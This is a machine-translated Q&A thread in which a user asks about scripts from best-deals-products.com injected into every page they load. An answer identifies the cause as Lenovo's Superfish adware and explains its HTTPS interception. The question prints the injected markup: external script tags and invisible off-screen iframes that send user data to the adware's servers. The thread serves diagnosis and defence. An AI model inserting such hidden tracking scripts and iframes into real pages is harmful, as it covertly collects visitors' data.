Ead*_*yth 6 virus html google-chrome malware javascript
我发现了一些我怀疑是恶意软件/附加软件的东西。我访问的每个网站都添加了脚本,即使是我自己制作的。这是在 : 中添加的,http://puu.sh/dgIF0/0c452eb390.png
而 iFrame 在正文 ( http://puu.sh/dgJf3/c700693208.png)中创建。我检查了其中的一些,按照链接并注意到它收集元数据并将其上传到互联网。(一段代码:http://puu.sh/dgIJE/3c53d5b1cc.png使用此代码也有错误)。我在互联网上找不到很多关于 Best-Deal-Products 的(有用的)信息,(因此这条消息)。此外,当我使用 Internet Explore 或 Google chrome 便携版(而不是“普通”Google chrome)时,它又出现了。作为 JunkwareRemovalTool 的程序没有解决问题(如果它确实是一个问题)。关于我的系统:我使用 advast!(免费),我有一个 windows8 64 位操作系统,还有 Lenova 的东西。从我的电脑打开 html 文件时不会出现这个问题,只有来自 Internet 的 html 文件。此外,我使用的网络似乎并不重要。我制作了一个空白的 php 文件并将其上传到 000webhost。查看源代码时,头脑中只有这个:<script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script>
但是当使用“检查元素”时,会显示很多不是我的代码(在 000webhost 代码旁边),这些元素在附件中。以下内容也在附件中:在标签中找到的 Best-Deal-Products 的 URL 和访问 google.nl 时来自 google chrome 的控制台日志
我的主要问题是:什么是最优惠的产品?它有什么作用?对我有什么负面影响吗?如果是,我该怎么办?我希望我提供了足够的信息,但以防万一;问,我会尝试找到它(或 TeamViewer 会话?)我还请求了 avast 的帮助!和病毒总数。
依恋:
标签中的链接
https://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.3.1
Run Code Online (Sandbox Code Playgroud)
标签中的链接:
https://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&userid=&ver=2014.12.4.3.1
https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.3.1
Run Code Online (Sandbox Code Playgroud)
访问 google.nl 时从 google chrome 登录
Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
sf_main.jsp?dlsource=hdrykzc:322 Uncaught TypeError: Cannot read property 'appendChild' of null
(index):4 Resource interpreted as Script but transferred with MIME type text/html: "https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc".
Resource interpreted as Image but transferred with MIME type text/javascript: "https://www.best-deals-products.com/ws/tu.action?userId=fa8fa52b-c827-d5d4-…d8615-d4a&referrer=&page_url=https%3A%2F%2Fwww.google.nl%2F%3Fgws_rd%3Dssl".
frame?sourceid=1&hl=nl&origin=https%3A%2F%2Fwww.google.nl&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%…:1 Refused to load the script 'https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc' because it violates the following Content Security Policy directive: "script-src 'unsafe-inline' 'unsafe-eval' 'self' https://*.googleapis.com https://*.gstatic.com https://apis.google.com https://www.google-analytics.com https://www.googletagmanager.com https://*.talkgadget.google.com https://pagead2.googleadservices.com https://pagead2.googlesyndication.com https://tpc.googlesyndication.com https://s.ytimg.com https://www.youtube.com https://clients1.google.com https://www.google.com".
Run Code Online (Sandbox Code Playgroud)
我在 000webhost 上托管的“空白”php 文件中的元素:
<html><head><script src="https://www.best-deals-products.com/ws/sf_main.jsp?dlsource=hdrykzc"></script><style type="text/css"></style><script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_preloader.jsp?dlsource=hdrykzc&ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/sf_code.jsp?dlsource=hdrykzc&ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/slideup2/main.js?ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/side_slider/main.js?ver=2014.12.4.4.1"></script><script type="text/javascript" src="http://www.best-deals-products.com/ws/js/base_single_icon.js?ver=2014.12.4.4.1"></script><link rel="stylesheet" href="http://www.best-deals-products.com/ws/css/main.css?v=2014.12.4.4.1"></head>
<body>
<div>
</div>
<!-- Hosting24 Analytics Code -->
<!-- End Of Analytics Code --><script type="text/javascript" src="http://stats.hosting24.com/count.php"></script>
<iframe src="http://www.best-deals-products.com/ws/userData.jsp?dlsource=hdrykzc&userid=&ver=2014.12.4.4.1" style="position: absolute; top: -100px; left: -100px; z-index: -10; border: none; visibility: hidden; width: 1px; height: 1px;"></iframe><iframe src="https://www.best-deals-products.com/ws/co/register_server_layer.html?version=2014.12.4.4.1" style="position: absolute; width: 1px; height: 1px; left: -100px; top: -100px; visibility: hidden;"></iframe><iframe style="position: absolute; width: 1px; height: 1px; top: 0px; left: 0px; visibility: hidden;"></iframe><sfmsg id="sfMsgId" data="{"imageCount":0,"ip":"1.1.1.1"}"></sfmsg></body></html>
Run Code Online (Sandbox Code Playgroud)
小智 6
据透露,许多联想电脑都配备了一种名为“Superfish”的软件,该软件可以对所有 HTTP 执行中间人攻击,甚至使用自签名 SSL 证书来保护 HTTPS 请求。除此之外,Superfish 将来自 best-deals-products.com 的 javascript 注入到每个加载的网页中。
此外,由于背后公司的无知,所包含的私钥已经被提取出来,准备在公共场合拦截来自联想电脑的任何 HTTPS 流量。
这意味着,即使对于银行业务或交易,任何攻击者都可以通过嗅探您的 Wi-Fi 信号来读取所谓的安全内容。这是一种非常危险的情况。
曾经有一个案例,通过使用像 JS Bin 这样的基于 Web 的 IDE 编写代码,下载文件并将其上传到托管服务器,脚本被传播给其他人,即使是不使用联想电脑的人。
您可以在此处查看完整的详细信息,包括您是否容易受到攻击。您可能还想查看联想关于 Superfish的官方声明、关于该漏洞的安全建议以及建议的删除说明。